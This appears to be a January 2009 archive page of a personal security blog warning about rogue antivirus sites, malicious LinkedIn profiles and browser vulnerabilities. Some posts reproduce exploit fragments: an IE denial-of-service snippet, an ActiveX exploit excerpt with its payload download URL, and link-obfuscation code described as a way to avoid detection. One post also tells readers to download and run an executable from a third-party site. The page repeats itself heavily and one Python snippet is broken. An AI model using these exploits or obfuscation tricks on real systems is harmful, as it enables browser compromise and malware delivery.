A Change From Dirty Laundry…
4 hours ago
Saturday, January 31, 2009
Google Chrome 1.0.154.46 : Parameter Injection PoC
Google Chrome parameter injection PoC found on 1.0.154.46
Thursday, January 22, 2009
Google publish potential rogue security product in adv link ?
When I searching Browser Defender keyword using Google search engine last few days. I found out Google was publish rogue security products on website in their adv column. WOT installed in Firefox browser indicated RED on the particular link. "http://internetexplorer.pro/"
Robtex display few other potential rogue links when search it using IP address "74.54.156.235". The IP address can be get once after Address Lookup "http://internetexplorer.pro/" !!
Website that rated as malicious www.spywareremover.com also share same IP address with http://internetexplorer.pro/!
Robtex display few other potential rogue links when search it using IP address "74.54.156.235". The IP address can be get once after Address Lookup "http://internetexplorer.pro/" !!
Website that rated as malicious www.spywareremover.com also share same IP address with http://internetexplorer.pro/!
- *.fixfileextension.com
- *.internetexplorer.pro
- *.javascript.pro
- *.mediaplayer.pro
- drivers.pro
- eb.9c.364a.static.theplanet.com
- internetexplorer.pro
- eb.9c.364a.static.theplanet.com
- javascript.pro
- mail.2squared.com
- mail.adwarealert.com
- mail.adwarebot.com
- mail.antispyware.com
- mail.antispywarebot.com
- mail.drivers.pro
- mail.erroreasy.com
- mail.errorfix.com
- mail.errorkiller.com
- mail.errorsmart.com
- mail.errorsrepair.com
- mail.errorstool.com
- mail.errorsweeper.com
- mail.evidenceeraser.com
- mail.macrovirus.com
- mail.malwareremovalbot.com
- mail.privacycontrol.com
- mail.regclean.com
- mail.regfixpro.com
- mail.registryfox.com
- mail.registrysmart.com
- mail.regsweep.com
- mail.spywarebot.com
- mail.spywareremover.com
- mail.spywarestop.com
- mail.updatesregistry.com
- mediaplayer.pro
- spywareremover.com
- www.drivers.pro
- www.fixfileextension.com
- www.internetexplorer.pro
- www.javascript.pro
- www.repairerrors.com
- www.spywareremover.com
Firefox 3.0.5 Status Bar Obfuscation / Clickjacking
A guy who called as Mr. Doug found out Firefox 3.0.5 Status Bar Obfuscation / Clicking; The article was posted yesterday in Milw0rm and received ~3.8k review hits within a day. I just wondering is the timeline for Firefox to release new patch fix the problem. Strongly feel that this PoC will be used to lead FF 3.0.5 users to click on malicious website.
Original source can be obtained from Milw0rm
Original source can be obtained from Milw0rm
Monday, January 19, 2009
ThreatExpert released their Browser Defender in Beta
ThreatExpert released "Browser Defender" browser toolbar to protect internet users by displaying rating on URL links. Besides that, it also integrated with search engine as well such as Google and Yahoo to provide safe rating before user continue visiting the site.
Proc:
-Nice looks with interactive colors.
-Comprehensive with detail result for particular site.
Cons:
- It only limited for Google and Yahoo search engine as I tested. Not integrated with MSN and Altavista search engine.
- Don't like the toolbar that occupied space in my Firefox browser. :(
- Not for Safari, Opera browser.
Download:
-Browser Defender download
Other than Browser Defender, there have few other available toolbars from different security vendor that provide similar functions for browsers (IE and FF)
- Siteadvisor
- SafeWeb
- WOT
Note: What the hack!!!! Some pages on Browser Defender links down when I wrote this article.. :(
- http://www.browserdefender.com/download/
- http://www.browserdefender.com/company/
- http://www.browserdefender.com/help/
Proc:
-Nice looks with interactive colors.
-Comprehensive with detail result for particular site.
Cons:
- It only limited for Google and Yahoo search engine as I tested. Not integrated with MSN and Altavista search engine.
- Don't like the toolbar that occupied space in my Firefox browser. :(
- Not for Safari, Opera browser.
Download:
-Browser Defender download
Other than Browser Defender, there have few other available toolbars from different security vendor that provide similar functions for browsers (IE and FF)
- Siteadvisor
- SafeWeb
- WOT
Note: What the hack!!!! Some pages on Browser Defender links down when I wrote this article.. :(
- http://www.browserdefender.com/download/
- http://www.browserdefender.com/company/
- http://www.browserdefender.com/help/
Tuesday, January 13, 2009
Microsoft first Tuesday Patch MS09-001 in 2009
2009 Microsoft released their patch cycle with MS09-001. This vulnerability rated as Critical according on what had mention in their security bulletin. No any PoC found yet since Microsoft released for their on Tuesday.
Related Link:
http://www.microsoft.com/technet/security/bulletin/MS09-Jan.mspx
Related Link:
http://www.microsoft.com/technet/security/bulletin/MS09-Jan.mspx
Fake Scanner Antivirus 2009 Protection & ScanOnlineFree
Be aware !!! Another fake websites exists in internet. :(
- http://liveantivirusscanner.com
- http://scanonlinefreee.com
- http://scan-onlinefreee.com
Monday, January 12, 2009
Conficker worm spreads through MS08-067 vulnerability
Recently, we keep hearing that Internet worm "Conficker worm" variants were spreading within corporate company. It already keep serious attention from few of Antivirus vendor. This worm exploit MS08-067 vulnerability although Microsoft released patch to encounter this hole. These malware variants name can be defined as Win32/Conficker.A [Computer Associates], W32/Downadup.A [F-Secure], Conficker.A [Panda Software]
Related blogs:
Related blogs:
Copy Google Documents to Your Account !!!
Someone sent me the link to a document published using Google Docs, but I didn't have the permission to edit the document. I wanted to save the document to my Google Docs account, but none of the options offered by Google allowed me to do that.
One of the ways you could create a duplicate for the document is to replace
http://docs.google.com/View?docid=AAAAA
with
http://docs.google.com/DocAction?action=copy&docid=AAAAA
where AAAAA is the document ID. [.......]
Reference:
http://googlesystem.blogspot.com/2009/01/copy-google-documents-to-your-account.html
One of the ways you could create a duplicate for the document is to replace
http://docs.google.com/View?docid=AAAAA
with
http://docs.google.com/DocAction?action=copy&docid=AAAAA
where AAAAA is the document ID. [.......]
Reference:
http://googlesystem.blogspot.com/2009/01/copy-google-documents-to-your-account.html
MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit !
Latest Microsoft IE DoS crashed Internet Explorer when open page that contain the following code.
Reference:
- html>
- title>MS IE 'screen[""]' Remote Denial of Service Vulnerability
- body onload=screen[""]>
- /html>
- Microsoft, Internet Explorer 6.0
- Microsoft, Internet Explorer 7.0
- Microsoft, Internet Explorer 8.0 Beta1
- Microsoft, Internet Explorer 8.0 Beta2
Reference:
- http://xforce.iss.net/xforce/xfdb/47788
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0072
- http://www.microsoft.com/windows/products/winfamily/ie/default.mspx
- http://www.securityfocus.com/bid/33149
- http://skypher.com/index.php/2009/01/07/msie-screen-null-ptr-dos-details/
- http://www.milw0rm.com/exploits/7710
Convert Character Code to HTML Entity code in Python
To hide for particular link to avoid from detected, we could use various of way to encode code. In Javascript, we can use String.fromCharCode() method used to decode unicode of the particular website link. Example for www.google.com
How we going to get unicode for www.google.com in Python?
For python, ord() function is used as follow.
import sys
st = sys.argv[1]
e = []
for a in st:
e.append("%s" %ord(a))
print ",".join(e)
Result:
- document.write(String.fromCharCode(119,119,119,46,103,111,111,103,108,101,46,99,111,109));
How we going to get unicode for www.google.com in Python?
For python, ord() function is used as follow.
import sys
st = sys.argv[1]
e = []
for a in st:
e.append("%s" %ord(a))
print ",".join(e)
Result:
Friday, January 9, 2009
IE 0Day "Print Table of Links"
According from 009, this kind of attacked triggered when users IE execute "Print Table of Links" and it called as (Cross-Zone Scripting).
Save the script below as html code, and open with Microsoft IE. Choose for printing and it will trigger calc.exe program.
You may download the executable code from http://www.blogjava.net/Files/baicker/calc.rar , save it to C:\ directory and rename to test.exe,Execute test.exe after rename it.
Please don't try to unzip it because the calc.rar already in PE file.
Save the script below as html code, and open with Microsoft IE. Choose for printing and it will trigger calc.exe program.
You may download the executable code from http://www.blogjava.net/Files/baicker/calc.rar , save it to C:\ directory and rename to test.exe,Execute test.exe after rename it.
Please don't try to unzip it because the calc.rar already in PE file.
Wednesday, January 7, 2009
More rouge av scanner to come
More rouge AV Antivirus and Scanner to come..
Five of url below share same IP address:
Five of url below share same IP address:
- www.av-online-scan.org/
- sys-scanner.com/
- spyprotector-pro.com
- av-online-scan.org/
- www.sys-scanner.com/
Tuesday, January 6, 2009
Rogue LinkedIn is going wild !
LinkedIn is one of the popular social networking site connecting people for business contact purposes. It offering "open" resume services that offered for peoples. Rogue LinkedIn offering with nude celebrities such as Kirsten Dunst, Christina Ricci and etc to entice LinkedIn users to fall in their malware traps.
Don't click on any Links that post within celebraties profiles because it will lead you to site to download *.exe file on your systems.
View content for the redirect URL link, you may that it will point to get *exe file
- hxxp://www. linkedin.com/in/christinaricci0
- hxxp://www. linkedin.com/in/kirstendunstnude08
Don't click on any Links that post within celebraties profiles because it will lead you to site to download *.exe file on your systems.
The link contain decoded malicious code that pointing to "hxxp://delshikandco.com/in.cgi?10" and redirect to "hxxp://megaporntubesonline.com/pornstars/xindex.php?id=88"
View content for the redirect URL link, you may that it will point to get *exe file
Cut lines in file using Python
# cut top 10 list in files
# load entire file in memory
text = open(targetfilename).readlines()
count = 0
while count < 10 :
del text[0]
count = count + 1
# store 10 lines back new file
fout = open(outputfilename,'w')
fout1.writeines(text)
fout1.close()
# load entire file in memory
text = open(targetfilename).readlines()
count = 0
while count < 10 :
del text[0]
count = count + 1
# store 10 lines back new file
fout = open(outputfilename,'w')
fout1.writeines(text)
fout1.close()
Monday, January 5, 2009
Rogue VirusRemover 2008 and Spyware Secure
Rogue Security solution is never ending because too many users internet don't have awareness on how to differential real security solution and fake security solution. The numbers of websites offering rogue solutions have been increase from day to days.
The web banners available on their website will enticing internet users from purchasing their security products by showing false warning to users that their systems have been infected. Once installed, it rogue application will add Trojan and executing more other unwanted actions.
Below is the VirusRemover 2008 and Spyware Secure snapshot.
http://www.trialpay.com/checkout/?c=9414c21&tid=A7D8nWW
http://www.spyware-secure.com/
By nslookup their IP address "77.245.61.80" and IPneighbors you may easily get
The web banners available on their website will enticing internet users from purchasing their security products by showing false warning to users that their systems have been infected. Once installed, it rogue application will add Trojan and executing more other unwanted actions.
Below is the VirusRemover 2008 and Spyware Secure snapshot.
http://www.trialpay.com/checkout/?c=9414c21&tid=A7D8nWW
http://www.spyware-secure.com/
By nslookup their IP address "77.245.61.80" and IPneighbors you may easily get
- bestsecureexpertcleaner.com
- bestvirusremover2008.com
- hypersecurefileshredder.com
- mysecureexpertcleaner.com
- para13.amsnl.webair.com
- pcvirusremover2008.com
- powerfulvirusremover2008.com
- registrydoctor2008.com
- registrydoctorpro2008.com
- secureexpertcleaner.com
- supersecurefileshredder.com
- topregistrydoctor2008.com
- virus-doctor-site.com
- virusremover2008flash.com
- virusremover2008plus.com
- winsecureexpertcleaner.com
- www.bestsecureexpertcleaner.com
- www.bestvirusremover2008.com
- www.mysecureexpertcleaner.com
- www.pcvirusremover2008.com
- www.powerfulvirusremover2008.com
- www.registrydoctor2008.com
- www.secureexpertcleaner.com
- www.virus-doctor-site.com
- www.winsecureexpertcleaner.com
- www.yoursecureexpertcleaner.com
- yoursecureexpertcleaner.com
- webair.com
- bestsecureexpertcleaner.com
- bestvirusremover2008.com
- powerfulvirusremover2008.com
- registrydoctor2008.com
- registrydoctorpro2008.com
- secureexpertcleaner.com
- virusremover2008flash.com
- virusremover2008plus.com
- winsecureexpertcleaner.com
- www.bestsecureexpertcleaner.com
- www.bestvirusremover2008.com
- www.powerfulvirusremover2008.com
- www.registrydoctor2008.com
- www.secureexpertcleaner.com
- www.winsecureexpertcleaner.com
- www.yoursecureexpertcleaner.com
- yoursecureexpertcleaner.com
- bestsecureexpertcleaner.com
- bestvirusremover2008.com
- iservicepack.com
- mysecureexpertcleaner.com
- pcvirusremover2008.com
- powerfulvirusremover2008.com
- registrydoctor2008.com
- registrydoctorpro2008.com
- secureexpertcleaner.com
- virus-doctor-site.com
- virusremover2008flash.com
- virusremover2008plus.com
- winsecureexpertcleaner.com
- www.bestsecureexpertcleaner.com
- www.bestvirusremover2008.com
- www.mysecureexpertcleaner.com
- www.pcvirusremover2008.com
- www.powerfulvirusremover2008.com
- www.registrydoctor2008.com
- www.secureexpertcleaner.com
- www.virus-doctor-site.com
- www.winsecureexpertcleaner.com
- www.yoursecureexpertcleaner.com
- yoursecureexpertcleaner.com
Saturday, January 3, 2009
SSReader Ultra Star Reader Exploited
SSReader Ultra Star Reader used to read PDG ebook. It can be download from official site. It gain quite popular tool especially in Asia.
Some of popular servers in China were compromised to host this kind of exploit. One of the example is http://xxxxx9090.cn/bbb/xx.htm
When checking the content of the xx.htm file, seem it target for the Browser ActiveX BO
~object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'>~/object>
~SCRIPT language="javascript">
window.onerror=function(){return true;}
Analysis:
Tools:
- malzilla
1. Highlight the javascript and "Send script to Decoder"
2. Change the 'eval' function to 'Document.write' function and press 'Run script' to deobfuscate the code
3. From here, the codes are in unicode. Have to decode again using 'Decode UCS2(%u)'
4. Once after decode the unicode, you may see it point to particular url to download file hxxp://xia1686.cn/xia/a.exe
5. a.exe was collected and sent to www.virustotal.com for analysis.
Based on Virustotal result, only 21/38 vendor detect the malicious file on 2-Jan-09
and 23/38 on 3-Jan-09
Some of popular servers in China were compromised to host this kind of exploit. One of the example is http://xxxxx9090.cn/bbb/xx.htm
When checking the content of the xx.htm file, seem it target for the Browser ActiveX BO
~object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'>~/object>
~SCRIPT language="javascript">
window.onerror=function(){return true;}
Analysis:
Tools:
- malzilla
1. Highlight the javascript and "Send script to Decoder"
2. Change the 'eval' function to 'Document.write' function and press 'Run script' to deobfuscate the code
3. From here, the codes are in unicode. Have to decode again using 'Decode UCS2(%u)'
4. Once after decode the unicode, you may see it point to particular url to download file hxxp://xia1686.cn/xia/a.exe
5. a.exe was collected and sent to www.virustotal.com for analysis.
Based on Virustotal result, only 21/38 vendor detect the malicious file on 2-Jan-09
and 23/38 on 3-Jan-09
Subscribe to:
Posts (Atom)
